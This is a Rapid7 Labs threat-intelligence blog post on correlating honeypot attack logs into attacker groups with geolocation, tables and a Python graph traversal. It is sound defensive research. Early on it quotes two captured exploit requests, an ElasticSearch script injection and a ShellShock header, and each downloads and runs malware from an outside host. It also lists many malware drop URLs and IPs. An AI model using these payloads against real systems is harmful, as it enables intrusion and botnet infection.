This post is the 12th in the series, "12 Days of HaXmas."

So the Christmas season is here, and between ordering gifts and drinking Glühwein what better way to spend your time than sieve through some honeypot / firewall / IDS logs and try to make sense of it, right?

At Rapid7 Labs, we're not only scanning the internet, but also looking at who out there is scanning by making use of honeypot and darknet tools. More precisely we're running a couple of honeypots spread around the world and collecting raw traffic PCAP files with something similar to tcpdump (just slightly more clever).

This post is just a quick log of me playing around with some of the honeypot logs. Most of what I'm doing here is happening in one of our backend systems as well, but I figured it might be cool to explain this by doing it manually.

Some background

The honeypot is fairly simple, it waits for incoming connections and then tries to figure out what to do with it. It might need to treat it as a SSL/TLS connection, or just a plain HTTP request. Depending on the incoming protocol, it will try to answer in a meaningful way. Even with some very basic honeypot that just opens a port and waits for requests, you will quickly find things like this:

GET /_search?source={"query":+{"filtered":+{"query":+{"match_all":+{}}}},+"script_fields":+{"exp":+{"script":+"import+java.util.*;import+java.io.*;String+str+=+\"\";BufferedReader+br+=+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec(\"wget+-O+/tmp/zldyls+http://61.176.223.109:1111/zldyls\").getInputStream()));StringBuilder+sb+=+new+StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}},+"size":+1} HTTP/1.1  
Host: redacted:9200  
Connection: keep-alive  
Accept-Encoding: gzip, deflate  
Accept: */*  
User-Agent: python-requests/2.4.1 CPython/2.7.8 Windows/2003Server  

or this:

GET HTTP/1.1 HTTP/1.1  
Accept: */*  
Accept-Language: en-us  
Accept-Encoding: gzip, deflate  
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* ");'  
Host: redacted  
Connection: Close  

What we're looking at are ElasticSearch (slightly modified as the path was URL decoded for better readability) and ShellShock exploit attempts. One can quickly see that the technique is fairly straightforward - there's a specific exploit that allows you to run commands. In these cases, the attackers are just running some straightforward shell commands in order to download a file (by any means necessary) and execute it. You can find several writeups around these exploitation attempts and the botnets behind it one the web (e.g. [1], [2], [3]).

Now because of this common pattern, our honeypot does some basic pattern matching and extracts any URL or command that it finds in the request. If there's a URL (inside a wget/curl/etc command), it will then try to download that file. We could also do this at post-processing stage, but by then the URL might not be available any more as these things tend to disappear or get taken down quickly.

Looking at the unique files from the last half year (roughly) we can count following file-types (reduced/combined for readability):

    178  ELF 32-bit LSB executable Intel 80386  
     66  a /usr/bin/perl script ASCII text executable  
     33  Bourne-Again shell script ASCII text executable  
     14  POSIX tar archive (GNU)  
     14  ELF 64-bit LSB executable x86-64  
      4  ELF 32-bit LSB executable MIPS  
      2  ELF 32-bit LSB executable ARM  
      1  ELF 32-bit MSB executable PowerPC or cisco 4500  
      1  ELF 32-bit MSB executable MIPS  
      1  OpenSSH DSA public key  

Typically the attacker is uploading a compiled malware binary. In some cases it's a shell script that will in turn download the next stage. And as we can see there's at least one case of an SSH public key that was uploaded - simple but effective. Also noteworthy is the targetting of quite a few different architectures. These are mostly binaries for embedded routers and for example the QNAP devices that are vulnerable to ShellShock.

Getting started on the logs

What kind of logs are we looking at? Mostly, our honeypot emits events like "there was a connection" or "i found a URL in a request" and "i downloaded a file from a URL". The first step is to grab a bunch of these events (a few thousand) and apply some geolocation to them (see DAP) (again, modified for better readability):

$ cat logs | dap json + geoip sensor + geoip source + remove some + rename some + json  
{  
  "ref": "conn-d7a38178-0520-49db-a79a-688f5ded5998",  
  "utcts": "2015-12-13T07:36:59.444356Z",  
  "sha1": "3eeb2eb0fdf9e4140277cbe4ce1149e57fae1fc9",  
  "url": "http://ys-k.ys168.com/2.0/475535157/jRSKjUt4H535F3XKNTV/pycn.zuc",  
  "url.netloc": "ys-k.ys168.com",  
  "source": "117.175.110.177",  
  "source.country_code": "CN",  
  "sensor": "redacted",  
  "sensor.country_code": "JP",  
  "dport": 9200,  
  "http.agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",  
  "http.method": "POST",  
  "vulns": "VULN-ELASTICSEARCH-RCE,CVE-2014-3120,EXEC-SHELLCMD",  
}  
...  

Now we can take these logs and do some correlatation, creating one record per "attack". We also add a couple more data sources (ASN lookup, filetypes for the downloaded files, etc).

For the sake of this post, let's focus on the attacks which lead to downloadable files and that we could categorize as shellshock / elasticsearch exploits.

By writing a quick formatting script that does some counting of fields we get something pretty like this (using python prettytable) (full version):

+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+  
| key             | count | seen              | sensorcountry | dport      | httpmethod | vulns                       | sha1                                          | url                                                                            |  
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+  
| 221.224.57.66   |   89  | first: 2015-08-05 |  54x US       |  89x 9200  |  89x GET   |  89x VULN-ELASTICSEARCH-RCE |  88x 53c458790384b9c33acafaa0c6ddf9bcbf35997e |  84x http://183.56.173.131:999/xiaojiba                                        |  
| CN              |       | last:  2015-08-08 |  14x JP       |            |            |      CVE-2014-3120          |   1x b6bb2b7cad3790887912b6a8d2203bebedb84427 |   4x http://221.224.57.66:999/xiaojiba                                         |  
| AS 4134         |       |                   |  10x AU       |            |            |      EXEC-SHELLCMD          |                                               |   1x http://221.224.57.66:999/qqqq                                             |  
|                 |       |                   |   5x IE       |            |            |                             |                                               |                                                                                |  
|                 |       |                   |   3x SG       |            |            |                             |                                               |                                                                                |  
|                 |       |                   |   3x BR       |            |            |                             |                                               |                                                                                |  
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+  
| 61.147.103.74   |   87  | first: 2015-05-06 |  55x US       |  87x 9200  |  87x GET   |  87x VULN-ELASTICSEARCH-RCE |  87x f7b229a46b817776d9d2c1052a4ece2cb8970382 |  72x http://61.147.103.74/Aqks                                                 |  
| CN              |       | last:  2015-05-27 |  15x SG       |            |            |      CVE-2014-3120          |                                               |  15x http://61.147.103.74/Aqmds                                                |  
| AS23650         |       |                   |  11x AU       |            |            |      EXEC-SHELLCMD          |                                               |                                                                                |  
|                 |       |                   |   4x JP       |            |            |                             |                                               |                                                                                |  
|                 |       |                   |   2x IE       |            |            |                             |                                               |                                                                                |  
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+  
| 117.175.111.10  |   63  | first: 2015-10-26 |  21x IE       |  63x 9200  |  63x POST  |  63x VULN-ELASTICSEARCH-RCE |  48x 3eeb2eb0fdf9e4140277cbe4ce1149e57fae1fc9 |  18x http://ys-f.ys168.com/2.0/475535129/gUuMfKl6I345M2KKMN3L/hgfd.pzm         |  
| CN              |       | last:  2015-10-27 |  11x US       |            |            |      CVE-2014-3120          |  15x 139033fef5a1dacbd5764e47f1403ebdf6bd854e |  15x http://ys-m.ys168.com/2.0/475535116/j5I614N5344N6HhSvKVs/pua.kfc          |  
| AS 9808         |       |                   |   9x JP       |            |            |      EXEC-SHELLCMD          |                                               |  15x http://ys-j.ys168.com/2.0/475535140/l5I614M7456NM1hVsIxw/ggg.vip          |  
|                 |       |                   |   8x AU       |            |            |                             |                                               |   9x http://ys-d.ys168.com/2.0/475535151/jRtNjKj7K426K6IH6PLK/wsy.sto          |  
|                 |       |                   |   8x SG       |            |            |                             |                                               |   5x http://183.60.202.97:12100/mmml                                           |  
|                 |       |                   |   6x BR       |            |            |                             |                                               |   1x http://ys-f.ys168.com/2.0/475535137/iTwHtWk4H537H4685MMK/mmml.bbt         |  
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+  
| 189.190.50.56   |   50  | first: 2015-11-05 |  23x US       |  50x 80    |  50x GET   |  50x VULN-SHELLSHOCK        |  37x 21762efb4df7cbb6b2331b34907817499f53be99 |  37x http://189.190.50.56/.b.gif                                               |  
| MX              |       | last:  2015-12-02 |  22x AU       |            |            |      CVE-2014-6271          |   4x 4172d5b70dfe4f5be3aaeb4b2b78fa230a27b97e |   4x http://189.190.50.56/b.gif                                                |  
| AS 8151         |       |                   |   5x BR       |            |            |                             |   4x 3a33f909c486406773b06d8da3b57f530dd80de6 |   4x http://173.220.57.150/scans/ip75.tar                                      |  
|                 |       |                   |               |            |            |                             |   3x ebbe8ebb33e78348a024f8afce04ace6b48cc708 |   3x http://173.220.57.150/scans/dom66.tar                                     |  
|                 |       |                   |               |            |            |                             |   2x 3caf6f7c6f4953b9bbba583dce738481da338ea7 |   2x http://173.220.57.150/scans/php77.tar                                     |  
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+  
...  

With my test dataset of roughly 2000 "attacks with downloads" this leads to 195 unique sources, that make use of several drop URLs and payloads over the course of a couple months.

Basic Threat Intelligence

Beyond simple correlation by source IP, we can now try to organize this data into some groups - basically trying to correlate several attack sources together based on the payloads and drop sites they use. In addition there are also more in-depth methods like analyzing the malware samples and coming up with specific indicators that allow you to group the binaries together even further.

The problem though is that manually doing this grouping is painful, as it's not enough to go one level deep. A source that uses a couple binaries which are also used from another source is the first layer. But then those sources already had their own binaries and URLs, and so on and so forth. Basically it comes down to a simple graph traversal. The individual data points like an attacker ip, a file hash, a drop host ip/name, etc can be viewed as nodes in a graph that have relationships with each other. All connected subgraphs within this graph make up our "groups" / attacker categories.

If you create a graph for our honeypot data set, it looks like this:

So to categorize our incidents into attacker groups we build up these subgraphs by writing a graph traversal function. We correlate attackers based on binaries used, hosts used for downloading payloads and hosts contacted by the malware samples themselves (sadly didn't get to do this for all of them).

  GRAPH = collections.defaultdict(set)  
  
  def add_edge(fr, to):  
    # undirected  
    GRAPH[fr].add(to)  
    GRAPH[to].add(fr)  
  
  def graph_traversal(src):  
    visited = set([src])  
    queue = [src,]  
    while queue:  
        parent = queue.pop(0)  
        children = GRAPH[parent]  
        for child in children:  
          if child not in visited:  
            yield parent, child  
            visited.add(child)  
            queue.append(child)  
  
  for e in DATA:  
    src = ("source", e["source"])  
    payload = ("payload", e["sha1"])  
    payloadsrc = ("payloadsrc", e["url.netloc"])  
  
    add_edge(src, payload)  
    add_edge(payload, payloadsrc)  
  
    for i in e.get("mal.tcplist", []):  
      add_edge(payload, ("c2", i))  
  
  n = 1  
  seen = set()  
  
  for src in set(e["source"] for e in DATA):  
    if src in seen: continue  
  
    members = set()  
    indicators = set()  
  
    for (ta, va), (tb, vb) in graph_traversal(("source", src)):  
      if ta == "source": members.add(va)  
      else: indicators.add((ta, va))  
      if tb == "source": members.add(vb)  
      else: indicators.add((tb, vb))  
  
    print json.dumps(dict(members=list(members), indicators=list(indicators), group=n))  
    n += 1  
    seen |= members  

This leads to 81 groups, as shown by the next table (full version):

+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+  
| key | count | seen              | source               | sourcecountry | srcasn        | sensorcountry | dport      | httpmethod | vulns                       | sha1                                          | url                                                                            |  
+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+  
|   3 |  224  | first: 2015-04-09 | 144x 115.29.174.5    | 210x CN       | 144x AS37963  |  84x US       | 224x 9200  | 158x POST  | 224x VULN-ELASTICSEARCH-RCE | 143x 4db1c73a4a33696da9208cc220f8262fb90767af |  65x http://23.234.25.203:15826/udpg                                           |  
|     |       | last:  2015-12-13 |  31x 222.186.21.201  |  14x KR       |  66x AS23650  |  44x IE       |            |  66x GET   |      CVE-2014-3120          |  81x 2b1f756d1f5b1723df6872d5727bf55f94c7aba9 |  53x http://23.234.25.203:15826/dos                                            |  
|     |       |                   |  14x 14.45.176.29    |               |  14x AS 4766  |  26x JP       |            |            |      EXEC-SHELLCMD          |                                               |  28x http://23.234.25.203:15826/udp                                            |  
|     |       |                   |  14x 61.160.247.231  |               |               |  26x SG       |            |            |                             |                                               |  16x http://23.234.25.203:15826/ud                                             |  
|     |       |                   |   8x 222.186.21.195  |               |               |  23x AU       |            |            |                             |                                               |  13x http://47.88.21.44:15826/udp                                              |  
|     |       |                   |   7x 222.186.21.166  |               |               |  21x BR       |            |            |                             |                                               |   7x http://23.234.25.203:15826/xxoo                                           |  
|     |       |                   |   5x 61.160.223.35   |               |               |               |            |            |                             |                                               |   7x http://61.160.223.35:15826/udp                                            |  
|     |       |                   |   1x 222.186.34.70   |               |               |               |            |            |                             |                                               |   7x http://23.234.25.203:15826/L88                                            |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   6x http://23.234.25.203:15826/xf23                                           |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   5x http://43.230.147.30:2017/udp                                             |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   4x http://61.160.247.231:15826/udp                                           |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   4x http://23.234.25.203:15826/udp110                                         |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   3x http://222.186.50.47:15826/udpg                                           |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   3x http://222.186.21.201:15826/udp                                           |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   3x http://222.186.34.70:2018/udp                                             |  
+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+  
|  12 |   23  | first: 2015-11-17 |   9x 206.217.134.130 |  19x US       |   9x AS36352  |  18x US       |  15x 80    |  15x GET   |  15x VULN-SHELLSHOCK        |   8x 81b65f4165a6b0689c3e7212ccf938dc55aae1bf |   8x http://192.240.106.106/lga                                                |  
|     |       | last:  2015-12-13 |   4x 198.245.72.234  |   2x TR       |   4x AS55286  |   3x AU       |   8x 9200  |   8x POST  |      CVE-2014-6271          |   8x c30026c548cd45be89c4fb01aa6df6fd733de964 |   2x http://69.30.200.250/ide.docx                                             |  
|     |       |                   |   4x 69.12.70.34     |   1x CA       |   4x AS 8100  |   1x JP       |            |            |   8x VULN-ELASTICSEARCH-RCE |   5x fe01a972a63f754fed0322698e16b2edc933f422 |   2x http://188.138.41.134/dd.exe                                              |  
|     |       |                   |   2x 91.191.170.111  |   1x DE       |   2x AS43391  |   1x BR       |            |            |      CVE-2014-3120          |   2x 05f32da77a9c70f429c35828d73d68696ca844f2 |   2x http://37.59.8.213/pacs                                                   |  
|     |       |                   |   1x 142.54.187.42   |               |   1x AS30083  |               |            |            |      EXEC-SHELLCMD          |                                               |   2x http://69.30.200.250/jof                                                  |  
|     |       |                   |   1x 209.126.110.239 |               |   1x AS32613  |               |            |            |                             |                                               |   1x http://69.58.3.226/api                                                    |  
|     |       |                   |   1x 174.142.46.120  |               |   1x AS24940  |               |            |            |                             |                                               |   1x http://192.240.106.106/dax.exe                                            |  
|     |       |                   |   1x 136.243.110.172 |               |   1x AS33387  |               |            |            |                             |                                               |   1x http://174.142.46.120/lma1                                                |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   1x http://69.12.70.34/api                                                    |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   1x http://188.138.41.134/lma1                                                |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   1x http://192.240.106.106/pisd                                               |  
|     |       |                   |                      |               |               |               |            |            |                             |                                               |   1x http://69.30.200.250/jla.cp                                               |  
+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+  
|  13 |   42  | first: 2015-04-23 |  22x 104.192.0.18    |  22x US       |  22x AS27176  |  14x US       |  21x 10000 |  42x GET   |  42x VULN-QNAP-SHELLSHOCK   |  12x 37c5ca684c2f7c9f5a9afd939bc2845c98ef5853 |  20x http://104.192.0.18/apache                                                |  
|     |       | last:  2015-04-27 |  20x 37.220.36.77    |  20x NL       |  20x AS58073  |  10x IE       |  18x 7778  |            |                             |  12x 3e4e34a51b157e5365caa904cbddc619146ae65c |  12x http://104.192.0.18/syn                                                   |  
|     |       |                   |                      |               |               |   8x SG       |   3x 8080  |            |                             |   7x 9d3442cfecf6e850a2d89d2817121e46f796a1b1 |   7x http://104.192.0.18/apache2                                               |  
|     |       |                   |                      |               |               |   7x BR       |            |            |                             |   7x 9851bcec479204f47a3642177c75a16b58d44c20 |   3x http://104.192.0.18/jawk                                                  |  
|     |       |                   |                      |               |               |   3x AU       |            |            |                             |   3x 1a412791a58dca7fc87284e208365d36d19fd864 |                                                                                |  
|     |       |                   |                      |               |               |               |            |            |                             |   1x d538717c89943f42716c139426c031a21b83c236 |                                                                                |  

What else?

As mentioned before, this can be done in much more detail, by analyzing the samples further and extracting better/more indicators than the contacted C2 hosts. Also there probably is more data around the hosts / domains used for the drop sites (payload URLs) that could potentially be used to correlate different sets. If we're taking some of the hosts/ips from above and use it to query Project Sonar we'll get dns records, open ports and certificate information:

address 104.152.190.2 had port 80/tcp open  
address 61.147.107.91 was seen in DNS A record for 58559.url.dnspud.com  
address 222.186.21.115 was seen in DNS A record for cc365cc-com-2015-7.com  
saw cert 93e5ad9fdf4c9a432a2ebbb6b0e5e0a055051007 on endpoint 216.99.150.113:465  
address 89.238.81.138 was seen in DNS A record for www.investorfinder.de  
address 97.74.204.6 was seen in DNS A record for teafortwohearts.com  
address 115.238.246.180 had port 80/tcp open  
address 66.240.252.49 had port 993/tcp open  
address 208.76.228.65 was seen in DNS A record for peoplesblueprint.ca  
address 222.141.64.65 had DNS PTR record hn.kd.ny.adsl  
address 180.97.215.7 was seen in DNS A record for jilijia.net  
address 203.171.230.109 was seen in DNS A record for cxyt.org  
elbinvestment.com had a DNS a record with value 89.31.143.1  
address 222.186.30.21 was seen in DNS A record for www.lerhe.com  
saw cert 25907d81d624fd05686111ae73372068488fcc6a on endpoint 178.162.207.107:993  
ys-f.ys168.com had a DNS A record pointing to IP 61.147.125.116  
address 180.97.215.7 had port 995/tcp open  
address 213.155.180.226 had port 465/tcp open  
address 113.10.149.45 was seen in DNS A record for school88le.com  
...  

Following this data / or adding it into the graph can yield some interesting results - but it's also of lower "quality" as most of the infrastructure used by the attackers probably consists of compromised systems and has lots of other use and thus there's a lot of noise around the activity of the attacker.

Summing up

Looking through these datasets can be fun but also a bit tricky at times. Command-line kungfu and some scripting can help pivot around the dataset if you don't want to put the effort in of using a database and something like SQL queries. Incident data and threat intelligence indicators quite often match the graph data model well and thus we can use of simple graph traversal functions or even a real graph database to analyze our data.

In order to analyze most of the samples I implemented Linux support in Cuckoo Sandbox. Available in the current development branch - follow us closely for the release of the next version!

Another noteworthy point is that honeypots can still yield some fun (not so much interesting) data nowadays. With internet scanning becoming more popular and easy to do, a few low-skill shotgun-type attackers are joining the game and try to get quick wins by running mass exploitation runs.

Rapid7 Labs is always interested in similar stories if you are willing to share them and let us know what you think in the comments!

Also feel free to tweet me personally @repmovsb.

Happy HaxMas!

-Mark

References:

[1] CARISIRT: Defaulting on Passwords (Part 1): r0_bot | CARI.net Blog

[2] Malware Must Die!: MMD-0030-2015 - New ELF malware on Shellshock: the ChinaZ

[3] Malware Must Die!: MMD-0032-2015 - The ELF ChinaZ "reloaded"